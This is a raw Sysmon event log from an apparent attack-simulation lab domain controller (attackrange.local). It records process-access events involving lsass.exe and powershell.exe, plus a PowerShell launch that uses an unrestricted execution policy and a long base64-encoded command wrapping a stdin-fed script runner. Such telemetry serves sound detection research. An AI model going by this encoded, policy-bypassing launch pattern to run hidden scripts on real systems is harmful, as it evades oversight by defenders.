AEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x800000000000000095Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.935{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7C3B-5FA1-F302-000000008701}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000094Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.935{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7C3B-5FA1-F302-000000008701}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000093Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.873{D28789B6-7C3B-5FA1-F302-000000008701}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_xzdyha4l.i4c.ps12020-11-03 15:50:19.873 10341000x800000000000000092Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.857{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3B-5FA1-F302-000000008701}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000091Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.841{D28789B6-7C3B-5FA1-F102-000000008701}15444764C:\Windows\system32\conhost.exe{D28789B6-7C3B-5FA1-F302-000000008701}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000090Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.841{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000089Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.841{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000088Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.841{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000087Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.841{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000086Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.841{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000085Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.841{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000084Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.841{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000083Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000082Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000081Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C3B-5FA1-F302-000000008701}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000080Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7C3B-5FA1-F202-000000008701}42084444C:\Windows\system32\cmd.exe{D28789B6-7C3B-5FA1-F302-000000008701}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000079Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.832{D28789B6-7C3B-5FA1-F302-000000008701}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3B-5FA1-858E-100000000000}0x108e850HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C3B-5FA1-F202-000000008701}4208C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwA